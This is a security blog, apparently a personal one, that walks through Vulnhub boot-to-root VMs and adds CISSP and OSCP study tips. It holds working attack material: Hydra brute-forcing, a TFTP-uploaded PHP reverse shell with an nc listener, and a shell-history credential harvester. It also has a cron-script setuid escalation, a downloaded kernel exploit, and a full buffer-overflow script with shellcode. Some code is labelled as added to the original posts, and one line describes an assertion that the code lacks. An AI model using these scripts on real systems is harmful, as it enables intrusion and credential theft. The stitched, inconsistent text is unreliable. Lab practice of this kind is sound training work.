    21/tcp    open   ftp         syn-ack ttl 64 vsftpd 2.0.8 or later
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    
    root@kali:~/Downloads# ftp 192.168.56.102
    Connected to 192.168.56.102.
    220-
    220-|-----------------------------------------------------------------------------------------|
    220-| Harry, make sure to update the banner when you get a chance to show who has access here |
    220-|-----------------------------------------------------------------------------------------|
    220-
    220 
    Name (192.168.56.102:root): Anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0             107 Jun 03 23:06 note
    226 Directory send OK.
    ftp> get note
    local: note remote: note
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for note (107 bytes).
    226 Transfer complete.
    107 bytes received in 0.00 secs (50.1884 kB/s)
    ftp> ^C
    ftp> 221 Goodbye.
    root@kali:~/Downloads# cat note 
    Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
    

The Attack

I then use the users I found to bruteforce the FTP accounts with hydra's -e nsr option (empty password, password equal to the login, and the login reversed).
    root@kali:~/Downloads# hydra -L users.txt -e nsr 192.168.56.102 ftp
    Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    
    Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-29 16:33:53
    [DATA] max 9 tasks per 1 server, overall 64 tasks, 9 login tries (l:3/p:3), ~0 tries per task
    [DATA] attacking service ftp on port 21
    [21][ftp] host: 192.168.56.102   login: elly   password: ylle
    1 of 1 target successfully completed, 1 valid password found
    Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-29 16:33:57
    

I can then log in over FTP as elly and pull down the sensitive files. The most useful is the passwd file, whose logins feed an SSH bruteforce. Using this, I obtain a local shell as SHayslett.
    root@kali:~/Downloads# ftp 192.168.56.102
    Connected to 192.168.56.102.
    220-
    220-|-----------------------------------------------------------------------------------------|
    220-| Harry, make sure to update the banner when you get a chance to show who has access here |
    220-|-----------------------------------------------------------------------------------------|
    220-
    220 
    Name (192.168.56.102:root): elly
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> get passwd
    local: passwd remote: passwd
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for passwd (2942 bytes).
    226 Transfer complete.
    2942 bytes received in 0.00 secs (35.0714 MB/s)
    ftp> get shadow
    local: shadow remote: shadow
    200 PORT command successful. Consider using PASV.
    550 Failed to open file.
    ftp> get vsftpd.conf
    local: vsftpd.conf remote: vsftpd.conf
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for vsftpd.conf (5961 bytes).
    226 Transfer complete.
    5961 bytes received in 0.00 secs (50.3084 MB/s)
    ftp> get ftpusers
    local: ftpusers remote: ftpusers
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for ftpusers (132 bytes).
    226 Transfer complete.
    132 bytes received in 0.00 secs (1.6564 MB/s)
    ftp> 221 Goodbye.
    root@kali:~/Downloads# cat passwd
    root:x:0:0:root:/root:/bin/zsh
    peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
    mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
    RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
    ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
    DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
    AParnell:x:1004:1004::/home/AParnell:/bin/bash
    SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
    MBassin:x:1006:1006::/home/MBassin:/bin/bash
    JBare:x:1007:1007::/home/JBare:/bin/bash
    LSolum:x:1008:1008::/home/LSolum:/bin/bash
    IChadwick:x:1009:1009::/home/IChadwick:/bin/false
    MFrei:x:1010:1010::/home/MFrei:/bin/bash
    SStroud:x:1011:1011::/home/SStroud:/bin/bash
    CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
    JKanode:x:1013:1013::/home/JKanode:/bin/bash
    CJoo:x:1014:1014::/home/CJoo:/bin/bash
    Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
    LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
    JLipps:x:1017:1017::/home/JLipps:/bin/sh
    jamie:x:1018:1018::/home/jamie:/bin/sh
    Sam:x:1019:1019::/home/Sam:/bin/zsh
    Drew:x:1020:1020::/home/Drew:/bin/bash
    jess:x:1021:1021::/home/jess:/bin/bash
    SHAY:x:1022:1022::/home/SHAY:/bin/bash
    Taylor:x:1023:1023::/home/Taylor:/bin/sh
    mel:x:1024:1024::/home/mel:/bin/bash
    kai:x:1025:1025::/home/kai:/bin/sh
    zoe:x:1026:1026::/home/zoe:/bin/bash
    NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
    www:x:1028:1028::/home/www:
    postfix:x:112:118::/var/spool/postfix:/bin/false
    ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
    elly:x:1029:1029::/home/elly:/bin/bash
    
    root@kali:~/Downloads# awk -F':' '{ print $1}' passwd > users.txt
    root@kali:~/Downloads# hydra -L users.txt -e nsr 192.168.56.102 ssh
    Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    
    Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-29 16:44:16
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
    [DATA] attacking service ssh on port 22
    [22][ssh] host: 192.168.56.102   login: SHayslett   password: SHayslett
    1 of 1 target successfully completed, 1 valid password found
    Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-29 16:45:13
    

    Local Privilege 3: TFTP

    TFTP (UDP port 69) accepts unauthenticated writes here, and its root directory is the document root of the web server on port 80, so I can upload a PHP reverse shell directly and then request it through the web server. Note that the tftp client defaults to netascii mode (visible in the transfer below); that is harmless for a PHP file, but use the binary command (octet mode) for anything that is not plain text.
    root@kali:/var/www# tftp 192.168.56.102
    tftp> ls     
    ?Invalid command
    tftp> verbose
    Verbose mode on.
    tftp> put shell.php
    putting shell.php to 192.168.56.102:shell.php [netascii]
    Sent 3605 bytes in 0.0 seconds [inf bits/sec]
    tftp>
    

    I set up a listener with nc and, once the reverse shell connects back (as the www user), I upgrade it to a proper TTY with python's pty module.
    root@kali:~/Downloads# nc -nlvp 443
    listening on [any] 443 ...
    connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 49622
    Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
     18:05:58 up  4:15,  1 user,  load average: 0.00, 0.01, 0.05
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    JKanode  pts/2    192.168.56.101   16:04    1:36m  0.08s  0.11s sshd: JKanode [priv]
    uid=1028(www) gid=1028(www) groups=1028(www)
    /bin/sh: 0: can't access tty; job control turned off
    $ python -c 'import pty;pty.spawn("/bin/bash")'
    www@red:/$ 
    

    Privilege Escalation

    Privilege Escalation 1: Bash History

    Using find, I printed every .bash_history file I was allowed to read. One user's history contains sshpass commands with the plaintext passwords of two accounts, JKanode and peter.
    www-data@red:/home$ find -name ".bash_history" -exec cat {} \;
        find -name ".bash_history" -exec cat {} \;
        ...
        id
        cat: ./peter/.bash_history: Permission denied
        find: './peter/.cache': Permission denied
        exit
        id
        whoami
        ls -lah
        pwd
        ps aux
        sshpass -p thisimypassword ssh JKanode@localhost
        apt-get install sshpass
        sshpass -p JZQuyIN5 peter@localhost
        ...
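
The history search above, generalized as an added example that is not part of the original post: it walks the home directories, skips histories it cannot read, and pulls user/password pairs out of the command-line patterns that most often leak them (sshpass -p, mysql -p, curl -u). The sample history is constructed; its two sshpass lines mirror the ones recovered above.

```python
# Added example (not from the original post): harvest plaintext credentials
# from readable shell histories, generalising the manual "find ... -exec cat".
import os
import re

PATTERNS = {
    # sshpass -p <pw> [ssh] [opts] user@host
    "sshpass": re.compile(
        r"sshpass\s+-p\s*(?P<pw>\S+)\s+(?:ssh\s+)?(?:-\S+\s+)*(?P<user>[^\s@]+)@(?P<host>\S+)"),
    # mysql -u<user> -p<pw>  or  --user=<user> --password=<pw>  (a bare -p prompts, so no match)
    "mysql": re.compile(
        r"mysql\b.*?(?:--user=|-u\s*)(?P<user>\S+).*?(?:--password=|-p)(?P<pw>\S+)"),
    # curl -u user:pw
    "curl": re.compile(r"curl\b.*?(?:--user|-u)\s+(?P<user>[^:\s]+):(?P<pw>\S+)"),
}

# Constructed sample history; the sshpass lines mirror the ones found on the box.
SAMPLE_HISTORY = """\
id
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
mysql -u root -pS3cret wordpress
curl -u admin:hunter2 http://10.0.0.5/api
mysql -u root -p
""".splitlines()


def extract_credentials(lines):
    """Return (tool, user, password, host) for every history line that matches a pattern."""
    found = []
    for line in lines:
        for tool, rx in PATTERNS.items():
            m = rx.search(line)
            if m:
                host = m.groupdict().get("host", "")  # only sshpass carries a host
                found.append((tool, m.group("user"), m.group("pw"), host))
                break
    return found


def collect_histories(home_root="/home",
                      names=(".bash_history", ".zsh_history", ".mysql_history")):
    """Yield (path, lines) for each history file we may read; unreadable ones are skipped."""
    for entry in os.scandir(home_root):
        for name in names:
            path = os.path.join(entry.path, name)
            try:
                with open(path, errors="replace") as fh:
                    yield path, fh.read().splitlines()
            except OSError:  # permission denied or missing file
                continue


if __name__ == "__main__":
    for path, lines in collect_histories():
        for hit in extract_credentials(lines):
            print(path, hit)
```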
    

    I then learn from sudo -l that peter may run any command as root. With that, I change his login shell to /bin/bash (because I don't like zsh), switch to a root shell with sudo -i, and print flag.txt.
    ssh peter@192.168.56.102
    red% sudo -l
    
        We trust you have received the usual lecture from the local System
        Administrator. It usually boils down to these three things:
    
            #1) Respect the privacy of others.
            #2) Think before you type.
            #3) With great power comes great responsibility.
    
    [sudo] password for peter: 
        Matching Defaults entries for peter on red:
            lecture=always, env_reset, mail_badpass,
              secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    
        User peter may run the following commands on red:
            (ALL : ALL) ALL
    red% sudo usermod -s /bin/bash peter
    peter@red:~$ sudo -i
        ➜  ~ cd /root
        ➜  ~ ls
        fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
        ➜  ~ cat flag.txt 
        ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                                  .-'''''-.
                                  |'-----'|
                                  |-.....-|
                                  |       |
                                  |       |
                 _,._             |       |
            __.o`   o`"-.         |       |
         .-O o `"-.o   O )_,._    |       |
        ( o   O  o )--.-"`O   o"-.`'-----'`
         '--------'  (   o  O    o)  
                      `----------`
    

    Privilege Escalation 2: SUID

    Once I have a local shell, I can search for privilege escalation paths with linuxprivchecker, which can be found at: http://www.securitysift.com/download/linuxprivchecker.py. Its world-writable-files listing turns up a script in /usr/local/sbin that is run by a cron job.
    python linuxprivchecker.py > linuxpriv.txt
    less linuxpriv.txt
    
    [+] World Writable Files
        -rw-rw-rw- 1 mysql mysql 39 Aug 29 15:24 /var/www/https/blogblog/wp-content/uploads/shell.php
        -rwxrwxrwx 1 www www 0 Jun  3 14:48 /etc/authbind/byport/80
        -rwxrwxrwx 1 root root 51 Jun  3 20:41 /usr/local/sbin/cron-logrotate.sh
    
    JKanode@red:/tmp$ cat /usr/local/sbin/cron-logrotate.sh 
    #Simon, you really need to-do something about this
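
The targeted version of that check, as an added example that is not part of the original post: instead of eyeballing the full world-writable list, parse the system crontab(s), take the script each job executes, and flag the ones a non-owner can modify. The crontab text is a constructed sample (the post shows the script but not the crontab line that runs it), and the stat function is injectable so the logic can be exercised without real files.

```python
# Added example (not from the original post): find scripts that root's cron
# executes and that group/world can write to.
import os
import stat

# Constructed sample of a system crontab; the cron-logrotate.sh entry is assumed.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/5 * * * * root /usr/local/sbin/cron-logrotate.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot root /usr/local/bin/start-app.sh --quiet
"""


def parse_crontab(text, system=True):
    """Return (schedule, user, command) per job. System crontabs (/etc/crontab,
    /etc/cron.d/*) carry a user field; per-user crontabs do not."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:
            continue  # VAR=value line
        if first.startswith("@"):  # @reboot, @daily, ...
            parts = line.split(None, 2 if system else 1)
            schedule, rest = parts[0], parts[1:]
        else:
            parts = line.split(None, 6 if system else 5)
            schedule, rest = " ".join(parts[:5]), parts[5:]
        if system:
            if len(rest) < 2:
                continue
            user, command = rest[0], rest[1]
        else:
            if not rest:
                continue
            user, command = None, rest[0]
        jobs.append((schedule, user, command))
    return jobs


def script_path(command):
    """First word of the command if it is an absolute path (the file cron will run)."""
    words = command.split()
    return words[0] if words and words[0].startswith("/") else None


def writable_by_others(mode):
    """True if group or world has write permission (the owner is assumed trusted)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_writable_cron_scripts(jobs, stat_mode=lambda p: os.stat(p).st_mode):
    """Return (user, path) for jobs whose script is group/world writable."""
    hits = []
    for _schedule, user, command in jobs:
        path = script_path(command)
        if path is None:
            continue
        try:
            mode = stat_mode(path)
        except OSError:
            continue  # script missing or metadata unreadable
        if writable_by_others(mode):
            hits.append((user, path))
    return hits


if __name__ == "__main__":
    import glob
    for crontab in ["/etc/crontab"] + glob.glob("/etc/cron.d/*"):
        try:
            with open(crontab) as fh:
                text = fh.read()
        except OSError:
            continue
        for user, path in find_writable_cron_scripts(parse_crontab(text)):
            print("%s: %s runs %s, which is writable by non-owners" % (crontab, user, path))
```

A job whose command is not an absolute path (the run-parts line above) is skipped rather than resolved through PATH; extending the check to the directories run-parts walks is the obvious next step.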
    

    I can therefore replace the contents of the world-writable cron script with commands that make a binary of mine setuid root. I write a small C program that calls setuid(0)/setgid(0) and spawns bash, compile it, and wait for cron to run. The chown has to come before the chmod, because changing the owner of a file clears its setuid bit. Once the cron job has fired, running the binary gives a root shell.
    JKanode@red:/tmp$ echo -e 'chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;' > /usr/local/sbin/cron-logrotate.sh 
    JKanode@red:/tmp$ echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
    JKanode@red:/tmp$ gcc setuid.c -o setuid
    setuid.c: In function ‘main’:
    setuid.c:8:2: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
      system("/bin/bash");
    
    JKanode@red:/tmp$ ./setuid
    root@red:/tmp# cat /root/flag.txt 
    ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                              .-'''''-.
                              |'-----'|
                              |-.....-|
                              |       |
                              |       |
             _,._             |       |
        __.o`   o`"-.         |       |
     .-O o `"-.o   O )_,._    |       |
    ( o   O  o )--.-"`O   o"-.`'-----'`
     '--------'  (   o  O    o)  
                  `----------`
    b6b545dc11b7a270f4bad23432190c75162c4a2b
    

    Privilege Escalation 3: Kernel Exploit

    First, I get the kernel version information.
    JKanode@red: uname -a
    Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
    

    Next, I find the exploit for Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) (CVE-2016-4557) at https://www.exploit-db.com/exploits/39772/. I download the archive from the Project Zero tracker (saving it under a usable name, since wget would otherwise name it after the query string), untar it, compile it on the target, and run it.
    wget https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552 -O exploit.tar
    tar -xvf exploit.tar
    cd ebpf_mapfd_doubleput_exploit
    ./compile.sh
    ./doubleput
    
    root@red:/tmp/ebpf_mapfd_doubleput_exploit# cat /root/flag.txt 
    ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                              .-'''''-.
                              |'-----'|
                              |-.....-|
                              |       |
                              |       |
             _,._             |       |
        __.o`   o`"-.         |       |
     .-O o `"-.o   O )_,._    |       |
    ( o   O  o )--.-"`O   o"-.`'-----'`
     '--------'  (   o  O    o)  
                  `----------`
    b6b545dc11b7a270f4bad23432190c75162c4a2b
    

    I hope this helps everyone to crack this awesome VM.
    Thanks to g0tmilk for creating the VM, and most of all for hosting vulnhub.com so we have awesome VMs to practice on.

    Saturday, January 30, 2016

    Conquering the CISSP

    Background
    After about four months of studying on and off, I passed the CISSP certification exam. This test contains content that is one-inch deep and a mile wide. You are given six hours to complete an extremely long 250-question exam. Although the test is long and questions are wordy, it is very fair with only a few tricky questions.

    Study Materials
    The most important resource I used was the Cybrary.it videos and best of all it’s FREE. Kelly Handerhan KNOWS her stuff. She will cover all the content areas with the correct depth of information. Also, she will help you to know all the most important areas to focus on to pass the exam.

    The next few resources I used were: the All-in-one CISSP Study Guide by Shon Harris, CISSP Practice Exams by Shon Harris, and the McGraw-Hill Practice Tests. For your information, Shon Harris wrote all of these resources. The all-in-one book goes into a HUGE amount of unnecessary depth on all the topics. I read it cover-to-cover and took all the tests. However, you might be able to get away with focusing on the definitions. As for the practice tests, they were more technical than the actual exam but just as wordy. Using these test questions, I was able to practice deciphering wordy questions and the testing strategy given in the Tips section of this blog post.

    Lastly, I used 11th hour CISSP study Guide - Eric Conrad for my final review. This book does a great job describing the application of concepts. However, I would not recommend only using this book because the depth may be too shallow to be successful on the exam. It really helps with tying together things you already know.

    Exam
    The test took me a little over 4 of the 6 hours. One of the most important things I learned in my study was that not all domain areas are created equal. If I had to rank the groups by prevalence it would be:
    1. Information Security & Risk
    2. Business Continuity
    2. Access Control
    4. Telecommunications
    4. Software Dev
    6. Crypto
    7. Security Architecture
    8. Legal
    9. Physical
    10. Operations
    Note: There are significantly more of the top 5 domains than the remaining ones.

    Tips
    • Set a test date at a reasonable distance away and work to that date. Without the exam cost hanging over your head, it is likely you won’t ever feel “ready”.
    • Focus on the high level topics and their application like a manager would. Do not focus on the nitty-gritty technical details or in-depth memorization of standards. In this exam, you are there to point out problems, not to fix them.
    • Nine times out of ten, if an answer has more bureaucracy, it will be the correct one.
    • Don't get psyched out if questions are hard or weird. Those may just be beta questions that won't count against your score.
    • Due to the wordiness of the questions, it is better to eliminate incorrect answers than to find the correct one. In most questions you can eliminate two of the four choices, leaving a 50/50 chance. Across 250 questions that halves the pool from 1000 possible answers to 500, so even an outright guess lands at 50% instead of 25%. This approach totally worked for me!
    • TAKE CARE OF YOUR BODY! It will be much more important to get a good night's sleep the night before than to cram more information into your head. This is a LONG test, and you need endurance to pass it. Make sure you are well-fed with light, nutritious meals so you won't be sleepy.

    Hope all of these hints and tips help. Good Luck!

    Thursday, September 24, 2015

    I Tried Harder - OSCP Edition

    Background
    After about two and a half months of dedicating the majority of my time to the certification, I successfully became an OSCP. I have read many different blogs that gave great advice, but I thought I would add my spin on it as well.

    This certification is very time intensive. However, I feel it is the most worthwhile certification for an entry level penetration tester, and it will give you some credibility within the community. Throughout the certification, your primary focus will be exploiting and escalating privilege on vulnerable hosts.

    Preparation
    In preparation, I spent some time working on some vulnerable hosts on Vulnhub. On this site, people publish vulnerable machines very much like the ones you will see on the OSCP. You download and host the vulnerable machine on your computer and attack it. This is great practice for those who are unsure if the OSCP is for them.

    My favorites I have completed are:
    Lord of the Root <- I created this one. My solution is here.
    Troll 1 and 2

    If you can complete these, even with a little help of the walkthroughs, you should be at the right skill level for the OSCP.

    Also, I developed a script much like Mike at Security Sift to help automate the enumeration process. Since I have a developer background, this was relatively easy and painless. It was really time effective to have my enumeration process be completely automated. However, this is not essential.

    Course
    I recommend going through all the exercises. If you do not, you may not have all the tools you need for the job. Also, it will teach you buffer-overflows in great detail. It wouldn't hurt to review this multiple times. I did. Also, pay close attention to the enumeration section. This is the majority of what you will be doing for the rest of the certification.  You will also need to be prepared to take copious amounts of notes in both the lab and exam environment regarding your path of exploitation and privilege escalation. This will help you greatly with the writeup!

    In the lab environment, enumeration is the key! Many machines will be much easier if you have all of the available information. Also, some machines have dependencies on other network machines. If there doesn't seem to be a point of entry and you have enumerated well, the data you need is probably on another machine. Move on and try again later.

    I compromised almost all of the public network with a couple of machines in each of the other networks. I would recommend compromising most, if not all, of the public network before taking your exam. Also, the Admins in the IRC are a great resource for helping push you in the right direction on the lab machines. 

    Exam
    The exam is really where the rubber meets the road. In preparation for the exam, I wrote up my entire lab report in advance. This included the exercises, labs, executive summary, remediations, conclusion, and every other required piece. I also created a template for each exam machine to fill in once I had completed the exam. I did this because the last thing I wanted to do was spend the following 24 hours writing a long report after exhausting myself cracking machines for most of the night. Using my template, I needed only two hours to complete the exam writeup.

    I was told that if your exam is on the threshold of passing, reporting on your lab machines and exercises will greatly improve your likelihood of passing the OSCP. Begin working on your reporting early and be thorough. I don't want to get too specific about the exam, but what I can say is that if you have worked hard in the lab environment, it shouldn't be anything well beyond your understanding.

    After reflecting on my exam, I learned I should have taken care of my body better. Get as much sleep as you can the day before, and as much as you may want to work until the exam is completed, DON'T.  Getting some sleep and looking at it fresh will help you not to spin your wheels. I spent too much time spinning my wheels in stubbornness. 

    Recap
    1. Enumerate, Enumerate, Enumerate
    2. Take detailed notes in exercises, labs, and the exam. It will make report writing exponentially faster.
    3. Write most of your final report BEFORE the exam.
    4. Take care of your body during the test.

    I hope this all helps! Good luck and remember to "Try Harder!"

    Tuesday, September 22, 2015

    Hacking Lord Of the Root

    Background
    I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on the OSCP. This is a walkthrough to guide those who get stuck to complete the challenge. This is a boot-to-root machine and will not require any guest interaction.

    Note: There is one way in to a local low-privilege shell and there are two different root privilege escalations.

    The OVA can be found at: Vulnhub.

    Exploitation
    Upon booting up the machine I did a full TCP port scan of the host, and only SSH is open.

    Upon banner grabbing we see:

    Knock Friend? 1,2,3? That seems like port knocking to me..

    Another full nmap scan reveals a web server has opened!
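
The knock sequence just described, as an added example that is not part of the original post: parse the "1,2,3" hint out of the banner, send one TCP connection attempt per port in order, then check whether a previously closed port now answers. The target address and the port to re-check are assumptions (substitute the port your post-knock nmap scan shows); the knock daemon only needs to see the SYNs, so refused connections are the expected outcome for each knock.

```python
# Added example (not from the original post): replay a port-knock sequence
# taken from a banner hint and confirm a service opened afterwards.
import re
import socket
import time


def parse_knock_sequence(banner):
    """Pull the comma-separated port list out of a hint such as 'Knock Friend? 1,2,3?'."""
    m = re.search(r"(\d+(?:\s*,\s*\d+)+)", banner)
    if not m:
        return []
    return [int(p) for p in re.split(r"\s*,\s*", m.group(1))]


def knock(host, ports, delay=0.2, timeout=0.5):
    """TCP-connect to each port in order. A refused or timed-out connect still
    delivers the SYN the knock daemon watches for; the outcome is returned per port."""
    results = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            outcome = "open"
        except ConnectionRefusedError:
            outcome = "refused"
        except (socket.timeout, OSError):
            outcome = "filtered"
        finally:
            s.close()
        results.append((port, outcome))
        time.sleep(delay)  # some knockd setups enforce a minimum gap between knocks
    return results


def is_open(host, port, timeout=1.0):
    """Post-knock check that a port which was closed before now accepts connections."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    target = "192.168.56.102"   # assumed lab address
    web_port = 80               # assumed; use the port your second nmap scan reveals
    sequence = parse_knock_sequence("Knock Friend? 1,2,3?")
    print("knocks:", knock(target, sequence))
    print("port %d open after knock: %s" % (web_port, is_open(target, web_port)))
```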

    Webapp
    An examination of the webapp with Nikto and Dirb turns up nothing of interest, but manual testing and examination does find some things.

    Index.html
    But there is a comment on the 404 page...
    The comment seems to be base64 so we decode that:
    This URL takes us to a PHP login page that is vulnerable to SQL injection!
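
The class of bug behind that login page, as an added example that is not part of the original post: a string-built login query against an in-memory SQLite table, so the authentication bypass can be run offline, next to the parameterised query that closes it. The table, the accounts and the payload are constructed; the bypass works the same way against the MySQL-backed PHP page, which is what sqlmap automates next.

```python
# Added example (not from the original post): SQL injection login bypass,
# vulnerable and fixed versions side by side on an in-memory SQLite database.
import sqlite3


def make_db():
    """Constructed users table standing in for the site's real one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "S3cretPass"), ("guest", "guest")])
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """The query the vulnerable page effectively runs: input pasted into SQL syntax."""
    return ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def vulnerable_login(conn, username, password):
    """Returns True when any row matches, including rows reached by injected SQL."""
    return conn.execute(build_vulnerable_query(username, password)).fetchone() is not None


def safe_login(conn, username, password):
    """Parameterised query: the same input is always data, never syntax."""
    row = conn.execute("SELECT id FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row is not None


# Closes the username literal, makes the WHERE clause always true and comments
# out the password check ("-- " is a comment in SQLite and MySQL).
BYPASS_USERNAME = "' OR 1=1 -- "

if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(BYPASS_USERNAME, "x"))
    print("vulnerable login with bypass:", vulnerable_login(db, BYPASS_USERNAME, "x"))
    print("parameterised login with bypass:", safe_login(db, BYPASS_USERNAME, "x"))
```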

     So we dump the data with sqlmap:

    The root Mysql password was also weak:

    We checked for password reuse on ssh:
    We are in low privilege!

    There are two privilege escalations and both are described.

    Escalation A Buffer overflow:

    We found a setuid binary with a buffer overflow in the /SECRET directory. There are three files, but when you look at their sizes, one is smaller than the other two. That smaller one is the buffer overflow target.
    We copied the file to /tmp for exploit development, so we did not have to deal with the copies being rotated, and verified the crash.
    Next, we download GDB Peda. This gdb extension is the absolute best for exploit dev!

    We verified the crash in Peda using our exploit code. Notice we have overwritten EIP with 0x41414141, the ASCII characters "AAAA".

    We also check the binary's protections (Peda's checksec: stack canary, NX, PIE). There are none.
    HOWEVER, system-wide ASLR is on.
    Using GDB Peda, we find our EIP offset.


    Next, we verify that we control the EIP register. Notice the crash is now on 0x42424242, which is "BBBB".

    We generate our shellcode using Peda and add our shellcode to the exploit.

    Now that we know we have ASLR to circumvent, we need to modify our exploit code.

    Because ASLR randomizes the stack and the binary has no usable jmp esp instruction, there is no fixed address to return to, so we brute-force it. I ran the program in gdb a handful of times to get a feeling for where the stack landed on each execution, since it is different every time. (gdb disables address randomization by default; use "set disable-randomization off" to observe the real spread.) The addresses always started with 0xbf and only the remaining six hex digits varied, so I chose 0xcc for the next byte because it sat in the middle of my sample; the last four hex digits are arbitrary. To make that guess forgiving, we prepend a GIANT NOP sled. I used 20480 bytes, and it could be larger.

    Lastly, the script picks the smallest of the three files on each iteration, in case they are rotated mid-run, and runs it in an infinite loop. A segfault means the guessed address missed the sled, so the loop simply tries again; when the return address lands in the sled the shellcode runs and the loop stops on the spawned shell, giving us shell access.

    This was our final code:

    Note: You will notice a pause (back-off) around the os.system call. This is expected because os.system is a blocking call. You could make it non-blocking to improve the script, but os.system was a quick and dirty solution.
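
The payload layout and retry loop the text describes, as an added example; it is not the post's own final script (which is not reproduced here). The EIP offset, the low bytes of the 0xbfcc.... return address, the /SECRET file layout and the shellcode are placeholders to replace with your own values from Peda: the shellcode constant is the well-known 23-byte Linux x86 execve("/bin/sh") stub rather than the Peda-generated one the post used. If /bin/sh on the target is bash it drops the effective uid, so for a setuid target prepend a setuid(0) call to the shellcode.

```python
# Added example (not from the original post): stack-smash payload builder and
# the brute-force loop used to beat ASLR with a large NOP sled.
import os
import struct
import subprocess

OFFSET = 171           # assumed: bytes before EIP, from Peda's pattern offset
RET_ADDR = 0xBFCCAAAA  # 0xbf prefix and 0xcc byte chosen as in the text; low bytes arbitrary
NOP_SLED = 20480       # the post's sled length
# Well-known Linux x86 execve("/bin/sh") shellcode, standing in for the Peda-generated one.
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
             b"\x50\x53\x89\xe1\xb0\x0b\xcd\x80")


def build_payload(offset, ret_addr, nop_len, shellcode):
    """[padding][ret, little-endian][NOP sled][shellcode]: ret only has to land inside the sled."""
    return b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_len + shellcode


def find_target(candidates, size_fn=os.path.getsize):
    """The real binary is the smallest of the rotating copies; pick it fresh on every attempt."""
    return min(candidates, key=size_fn)


def run_until_shell(candidates, payload, max_attempts=1000):
    """Re-run until the child exits without a signal. A negative return code means
    it died of SIGSEGV (the guessed address missed the sled); a non-negative one
    means the shell ran and was closed by the operator. Returns the attempt count."""
    for attempt in range(1, max_attempts + 1):
        target = find_target(candidates)
        rc = subprocess.call([target, payload])  # blocks while the spawned shell is interactive
        if rc >= 0:
            return attempt
    return None


if __name__ == "__main__":
    import glob
    files = [p for p in glob.glob("/SECRET/*/*") if os.path.isfile(p)]  # layout assumed
    payload = build_payload(OFFSET, RET_ADDR, NOP_SLED, SHELLCODE)
    print("attempts:", run_until_shell(files, payload))
```

The payload must not contain a NUL byte, since it is passed as a C string in argv; the assertion on that property is the first thing to re-check after swapping in a different return address or shellcode.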
